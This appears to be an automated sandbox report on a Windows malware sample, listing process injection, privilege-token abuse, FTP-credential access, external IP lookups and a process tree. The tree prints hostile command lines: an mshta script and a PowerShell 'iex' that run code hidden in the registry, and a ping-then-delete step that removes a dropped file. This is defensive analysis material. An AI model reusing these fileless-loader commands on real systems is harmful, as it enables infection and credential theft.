rundll32.exesvchost.exepowershell.exeExplorer.EXEcmd.exedescription pid Process procid_target PID 3888 set thread context of 3832 3888 rundll32.exe 68 PID 3832 set thread context of 4016 3832 svchost.exe 71 PID 1320 set thread context of 2988 1320 powershell.exe 56 PID 2988 set thread context of 3356 2988 Explorer.EXE 59 PID 2988 set thread context of 3688 2988 Explorer.EXE 95 PID 3688 set thread context of 1924 3688 cmd.exe 97 PID 2988 set thread context of 2972 2988 Explorer.EXE 103 -
Suspicious use of AdjustPrivilegeToken 76 IoCs
Processes:
svchost.exesvchost.exedescription pid Process Token: SeImpersonatePrivilege 3832 svchost.exe Token: SeTcbPrivilege 3832 svchost.exe Token: SeChangeNotifyPrivilege 3832 svchost.exe Token: SeCreateTokenPrivilege 3832 svchost.exe Token: SeBackupPrivilege 3832 svchost.exe Token: SeRestorePrivilege 3832 svchost.exe Token: SeIncreaseQuotaPrivilege 3832 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3832 svchost.exe Token: SeImpersonatePrivilege 3832 svchost.exe Token: SeTcbPrivilege 3832 svchost.exe Token: SeChangeNotifyPrivilege 3832 svchost.exe Token: SeCreateTokenPrivilege 3832 svchost.exe Token: SeBackupPrivilege 3832 svchost.exe Token: SeRestorePrivilege 3832 svchost.exe Token: SeIncreaseQuotaPrivilege 3832 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3832 svchost.exe Token: SeImpersonatePrivilege 3832 svchost.exe Token: SeTcbPrivilege 3832 svchost.exe Token: SeChangeNotifyPrivilege 3832 svchost.exe Token: SeCreateTokenPrivilege 3832 svchost.exe Token: SeBackupPrivilege 3832 svchost.exe Token: SeRestorePrivilege 3832 svchost.exe Token: SeIncreaseQuotaPrivilege 3832 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3832 svchost.exe Token: SeImpersonatePrivilege 3832 svchost.exe Token: SeTcbPrivilege 3832 svchost.exe Token: SeChangeNotifyPrivilege 3832 svchost.exe Token: SeCreateTokenPrivilege 3832 svchost.exe Token: SeBackupPrivilege 3832 svchost.exe Token: SeRestorePrivilege 3832 svchost.exe Token: SeIncreaseQuotaPrivilege 3832 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3832 svchost.exe Token: SeImpersonatePrivilege 3832 svchost.exe Token: SeTcbPrivilege 3832 svchost.exe Token: SeChangeNotifyPrivilege 3832 svchost.exe Token: SeCreateTokenPrivilege 3832 svchost.exe Token: SeBackupPrivilege 3832 svchost.exe Token: SeRestorePrivilege 3832 svchost.exe Token: SeIncreaseQuotaPrivilege 3832 svchost.exe Token: SeAssignPrimaryTokenPrivilege 3832 svchost.exe Token: SeImpersonatePrivilege 4016 svchost.exe Token: SeTcbPrivilege 4016 svchost.exe Token: SeChangeNotifyPrivilege 4016 svchost.exe Token: SeCreateTokenPrivilege 4016 svchost.exe Token: SeBackupPrivilege 4016 svchost.exe Token: SeRestorePrivilege 4016 svchost.exe Token: SeIncreaseQuotaPrivilege 4016 svchost.exe Token: SeAssignPrimaryTokenPrivilege 4016 svchost.exe Token: SeImpersonatePrivilege 4016 svchost.exe Token: SeTcbPrivilege 4016 svchost.exe Token: SeChangeNotifyPrivilege 4016 svchost.exe Token: SeCreateTokenPrivilege 4016 svchost.exe Token: SeBackupPrivilege 4016 svchost.exe Token: SeRestorePrivilege 4016 svchost.exe Token: SeIncreaseQuotaPrivilege 4016 svchost.exe Token: SeAssignPrimaryTokenPrivilege 4016 svchost.exe Token: SeImpersonatePrivilege 4016 svchost.exe Token: SeTcbPrivilege 4016 svchost.exe Token: SeChangeNotifyPrivilege 4016 svchost.exe Token: SeCreateTokenPrivilege 4016 svchost.exe Token: SeBackupPrivilege 4016 svchost.exe Token: SeRestorePrivilege 4016 svchost.exe Token: SeIncreaseQuotaPrivilege 4016 svchost.exe Token: SeAssignPrimaryTokenPrivilege 4016 svchost.exe Token: SeRestorePrivilege 3696 WerFault.exe Token: SeBackupPrivilege 3696 WerFault.exe Token: SeDebugPrivilege 3696 WerFault.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeShutdownPrivilege 2988 Explorer.EXE Token: SeCreatePagefilePrivilege 2988 Explorer.EXE Token: SeShutdownPrivilege 2988 Explorer.EXE Token: SeCreatePagefilePrivilege 2988 Explorer.EXE Token: SeShutdownPrivilege 2988 Explorer.EXE Token: SeCreatePagefilePrivilege 2988 Explorer.EXE Token: SeShutdownPrivilege 2988 Explorer.EXE Token: SeCreatePagefilePrivilege 2988 Explorer.EXE -
Executes dropped EXE 1 IoCs
Processes:
BN220A.tmppid Process 3004 BN220A.tmp -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid Process 3732 iexplore.exe 3732 iexplore.exe 668 IEXPLORE.EXE 668 IEXPLORE.EXE 2080 iexplore.exe 2080 iexplore.exe 2564 IEXPLORE.EXE 2564 IEXPLORE.EXE 2080 iexplore.exe 2080 iexplore.exe 856 IEXPLORE.EXE 856 IEXPLORE.EXE 2080 iexplore.exe 2080 iexplore.exe 2564 IEXPLORE.EXE 2564 IEXPLORE.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid Process 1924 PING.EXE -
Suspicious use of WriteProcessMemory 67 IoCs
Processes:
rundll32.exerundll32.exesvchost.exeiexplore.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.exedescription pid Process procid_target PID 3044 wrote to memory of 3888 3044 rundll32.exe 67 PID 3044 wrote to memory of 3888 3044 rundll32.exe 67 PID 3044 wrote to memory of 3888 3044 rundll32.exe 67 PID 3888 wrote to memory of 3832 3888 rundll32.exe 68 PID 3888 wrote to memory of 3832 3888 rundll32.exe 68 PID 3888 wrote to memory of 3832 3888 rundll32.exe 68 PID 3888 wrote to memory of 3832 3888 rundll32.exe 68 PID 3888 wrote to memory of 3832 3888 rundll32.exe 68 PID 3832 wrote to memory of 1892 3832 svchost.exe 69 PID 3832 wrote to memory of 1892 3832 svchost.exe 69 PID 3832 wrote to memory of 1892 3832 svchost.exe 69 PID 3832 wrote to memory of 4016 3832 svchost.exe 71 PID 3832 wrote to memory of 4016 3832 svchost.exe 71 PID 3832 wrote to memory of 4016 3832 svchost.exe 71 PID 3832 wrote to memory of 4016 3832 svchost.exe 71 PID 3832 wrote to memory of 4016 3832 svchost.exe 71 PID 3832 wrote to memory of 3004 3832 svchost.exe 72 PID 3832 wrote to memory of 3004 3832 svchost.exe 72 PID 3832 wrote to memory of 3004 3832 svchost.exe 72 PID 3732 wrote to memory of 668 3732 iexplore.exe 77 PID 3732 wrote to memory of 668 3732 iexplore.exe 77 PID 3732 wrote to memory of 668 3732 iexplore.exe 77 PID 2080 wrote to memory of 2564 2080 iexplore.exe 84 PID 2080 wrote to memory of 2564 2080 iexplore.exe 84 PID 2080 wrote to memory of 2564 2080 iexplore.exe 84 PID 2080 wrote to memory of 856 2080 iexplore.exe 86 PID 2080 wrote to memory of 856 2080 iexplore.exe 86 PID 2080 wrote to memory of 856 2080 iexplore.exe 86 PID 952 wrote to memory of 1320 952 mshta.exe 89 PID 952 wrote to memory of 1320 952 mshta.exe 89 PID 1320 wrote to memory of 3532 1320 powershell.exe 91 PID 1320 wrote to memory of 3532 1320 powershell.exe 91 PID 3532 wrote to memory of 1720 3532 csc.exe 92 PID 3532 wrote to memory of 1720 3532 csc.exe 92 PID 1320 wrote to memory of 2056 1320 powershell.exe 93 PID 1320 wrote to memory of 2056 1320 powershell.exe 93 PID 2056 wrote to memory of 3980 2056 csc.exe 94 PID 2056 wrote to memory of 3980 2056 csc.exe 94 PID 1320 wrote to memory of 2988 1320 powershell.exe 56 PID 1320 wrote to memory of 2988 1320 powershell.exe 56 PID 1320 wrote to memory of 2988 1320 powershell.exe 56 PID 1320 wrote to memory of 2988 1320 powershell.exe 56 PID 2988 wrote to memory of 3356 2988 Explorer.EXE 59 PID 2988 wrote to memory of 3356 2988 Explorer.EXE 59 PID 2988 wrote to memory of 3688 2988 Explorer.EXE 95 PID 2988 wrote to memory of 3688 2988 Explorer.EXE 95 PID 2988 wrote to memory of 3688 2988 Explorer.EXE 95 PID 2988 wrote to memory of 3356 2988 Explorer.EXE 59 PID 2988 wrote to memory of 3356 2988 Explorer.EXE 59 PID 2988 wrote to memory of 3688 2988 Explorer.EXE 95 PID 2988 wrote to memory of 3688 2988 Explorer.EXE 95 PID 3688 wrote to memory of 1924 3688 cmd.exe 97 PID 3688 wrote to memory of 1924 3688 cmd.exe 97 PID 3688 wrote to memory of 1924 3688 cmd.exe 97 PID 3688 wrote to memory of 1924 3688 cmd.exe 97 PID 3688 wrote to memory of 1924 3688 cmd.exe 97 PID 2988 wrote to memory of 2900 2988 Explorer.EXE 98 PID 2988 wrote to memory of 2900 2988 Explorer.EXE 98 PID 2900 wrote to memory of 360 2900 cmd.exe 100 PID 2900 wrote to memory of 360 2900 cmd.exe 100 PID 2988 wrote to memory of 2052 2988 Explorer.EXE 101 PID 2988 wrote to memory of 2052 2988 Explorer.EXE 101 PID 2988 wrote to memory of 2972 2988 Explorer.EXE 103 PID 2988 wrote to memory of 2972 2988 Explorer.EXE 103 PID 2988 wrote to memory of 2972 2988 Explorer.EXE 103 PID 2988 wrote to memory of 2972 2988 Explorer.EXE 103 PID 2988 wrote to memory of 2972 2988 Explorer.EXE 103 -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 api.ipify.org -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 3696 3888 WerFault.exe 67 -
Checks whether UAC is enabled 5 IoCs
Processes:
iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Processes:
iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e0000000002000000000010660000000100002000000066e52da9b90312b16f52a6b504a39a97247712f4200c16dc355ec698aa189114000000000e8000000002000020000000349649b81f4bb2114e1cc60c5fd92b8ef243b1b19a28680177900c47f63783b920000000c23a708cb699a3099c7bc4eba9fc68fc4fb474073214afdd491e263a214a36864000000083638977fe21d92aca2f5844e6a23f3c425c7bc20964d28ca03386cc819a3cd77105180b0931292c60b3bd83fc534ea2fded059c681fef7bd28fe07c5efe530a iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{960AC07E-C529-11EA-95F0-F6ED97C2B3AA} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 809c30733659d601 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0ca1b753659d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30824758" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e00000000020000000000106600000001000020000000e3ea9e38f0581e4d440c296ae8ec7576885b152d270339356461cc623fb21e28000000000e800000000200002000000029727f4a6ef6aa4265aa955f27350883a47aa41e318d3ef649cd592b773d9c162000000087a5acbfaed9357f4964609d10013d5d3a89ef5b2e25e36a27023ab48d2f7e2d40000000edb32a9e8da4388dd4343a9c9c7fb0a9417077887434a0c7a551dfaee67a73e4c4dad83d75f27944ca194198880b2f571093ce75097193fcf4199919848d88f1 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e00000000020000000000106600000001000020000000e6e6411750eac6ca9cd24ff0cd59a4c1d699f7b95e11beb1b35b9d29f1f8933a000000000e80000000020000200000000b1deaf733fa17317240e6a2c309bdbd5d54be5614baa10bf4cc1497b49e4b3520000000d22cc396c2633ed1e31abf5803416b5f830e903212031046d097df1ef79dd732400000000db3726140e670a5dd12b7be9a076b39677219a9e34f45ee21f0e65a7098072f8293d8cf1acfceae880d04f0a8c83e920aa5e8a87bafb289864855e7bb8ce542 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30824758" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1787725303" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e00000000020000000000106600000001000020000000e0821344b27aa4310f923a89230ffc0926a41611529a67e1a9c372746d57da2b000000000e8000000002000020000000b0e2b5327de321d38e70d9fe2499284b9e5f2f8744588430c655b86faadf1589200000000d755f996aee4bb410c9864e9bc00d5ca884ec4f54ad1531accde4bec40d49c740000000a66493dcae082e5fa4c47ab81f40e12398cf0e6c02678b866405635b34142cbb70b8d4854bf4ef076aabf8e37a67ca202480454364a53b52bf8660ab373deb4d iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{AFB33055-C529-11EA-95F0-F6ED97C2B3AA} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 906d56763659d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1787725303" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 8004a36b3659d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9067996b3659d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f72535b3d71787499ad6028e231c2f4e000000000200000000001066000000010000200000004b3977217d35e1a8fdc46a6a49d550d052d820bfcafcaf87a3fe12405bb2db14000000000e8000000002000020000000b73909dc7b843dc1cce9e8b1ccecf4a921da9b644370c8cf08c21c22c18bc0a820000000395b1e6bdc40ff97abc100ec781166f5cd5b624a66cccc5bcae0554d4a66b1564000000071766330645885826cc1b115ca0cbb8ca4a6a308fe23a5516d88562c38d30c72d1ac5a9107404e7ac155432170f6f5dd13b72d79931e60cece114fa367c0a422 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe -
Checks for installed software on the system 1 TTPs 7 IoCs
Processes:
svchost.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName svchost.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName svchost.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid Process 1320 powershell.exe 2988 Explorer.EXE 2988 Explorer.EXE 3688 cmd.exe 2988 Explorer.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
PID:2988 -
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#12⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\434.dll,#13⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Checks for installed software on the system
PID:3832 -
C:\Windows\SysWOW64\cmd.execmd /K5⤵PID:1892
-
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\System32\svchost.exe5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\BN220A.tmpC:\Users\Admin\AppData\Local\Temp\BN220A.tmp5⤵
- Executes dropped EXE
PID:3004
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 6604⤵
- Suspicious behavior: EnumeratesProcesses
- Program crash
PID:3696
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2FFAFA40-C261-3936-44D3-167DB8B7AA01\\\Addrient'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\2FFAFA40-C261-3936-44D3-167DB8B7AA01").appiness))3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
PID:1320 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t5mgvxnp\t5mgvxnp.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E2A.tmp" "c:\Users\Admin\AppData\Local\Temp\t5mgvxnp\CSC8F49BDF4202F413796843AEF48E57DFD.TMP"5⤵PID:1720
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kymfvkxk\kymfvkxk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2EC6.tmp" "c:\Users\Admin\AppData\Local\Temp\kymfvkxk\CSC6113323816814A8F8C4E6E4EF44A387.TMP"5⤵PID:3980
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\BN220A.tmp"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Suspicious behavior: MapViewOfSection
PID:3688 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1924
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\72B.bi1"2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:360
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\72B.bi1"2⤵PID:2052
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:2972
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3356
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:3732 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3732 CREDAT:82945 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:668
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:2080 -
